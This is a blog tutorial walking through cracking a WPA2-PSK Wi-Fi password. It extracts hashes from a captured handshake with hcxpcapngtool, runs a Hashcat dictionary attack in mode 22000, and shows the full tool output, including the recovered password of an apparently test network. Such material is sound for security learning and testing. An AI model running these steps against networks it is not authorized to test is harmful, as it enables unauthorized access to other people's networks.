Post

Cracking WPA2-PSK with Hashcat

This post will cover how to crack Wi-Fi passwords (with Hashcat) from captured handshakes using a tool like airmon-ng.

  1. Install hcxtools
  2. Extract Hashes
  3. Crack with Hashcat

Install hcxtools

To start off we need a tool called hcxtools. If not already installed on your kali machine, you can install it using:

1
apt install hcxtools

Extract Hashes

Next we need to extract the required data and convert it to a format Hashcat can understand

1
hcxpcapngtool wifiCapture-01.cap -o /home/user1/wifiHashes.txt
  • -o to specify the output file the for extracted data.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
hcxpcapngtool 6.2.5 reading from wifiCapture-01.cap...

summary capture file
--------------------
file name................................: wifiCapture-01.cap
version (pcap/cap).......................: 2.4 (very basic format without any additional information)
timestamp minimum (GMT)..................: 05.02.2022 23:48:32

...

EAPOL M32E2 (authorized).................: 1
PMKID (total)............................: 2
PMKID (best).............................: 1
PMKID written to combi hash file.........: 1


session summary
---------------
processed cap files...................: 1

The output in the wifiHashes.txt file can now be fed into Hashcat:

1
2
WPA*01*b0f5e0b8617ab00c85f135ebaca7a865*112233445566*224466883355*5465737457696669***
WPA*02*96faaa6f7fe58a537433d88754cd8e65*112233445566*224466883355*5465737457696669*60...b0*0103....00*a2
  • Line 2 has been shortened

Crack with Hashcat

With the above out fille we can now use Hashcat (mode 2200) to crack the password much faster:

1
PS U:\Hashcat> .\hashcat.exe -m 22000 -w 3 .\toCrack\wifiHashes.txt .\passwordLists\hashkiller-dict.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Session..........: hashcat
Status...........: Running
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: .\toCrack\wifiHashes.txt
Time.Started.....: Sat Feb 05 23:58:37 2022 (3 mins, 26 secs)
Time.Estimated...: Sun Feb 06 00:09:37 2022 (7 mins, 34 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\passwordLists\hashkiller-dict.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   367.7 kH/s (78.55ms) @ Accel:64 Loops:512 Thr:128 Vec:1
Recovered........: 2/4 (50.00%) Digests
Progress.........: 87767490/254902169 (34.43%)
Rejected.........: 12007874/87767490 (13.68%)
Restore.Point....: 87724815/254902169 (34.42%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1536-2048
Candidate.Engine.: Device Generator
Candidates.#1....: leo31639 -> solyhe03
Hardware.Mon.#1..: Temp: 64c Fan: 32% Util: 87% Core:1888MHz Mem:6794MHz Bus:16

b0f5e0b8617ab00c85f135ebaca7a865:112233445566:224466883355:TestWifi:Password$123
96faaa6f7fe58a537433d88754cd8e65:112233445566:224466883355:TestWifi:Password$123

The attack was successful and we found out the Wi-Fi password was Password$123.

This post is licensed under CC BY 4.0 by the author.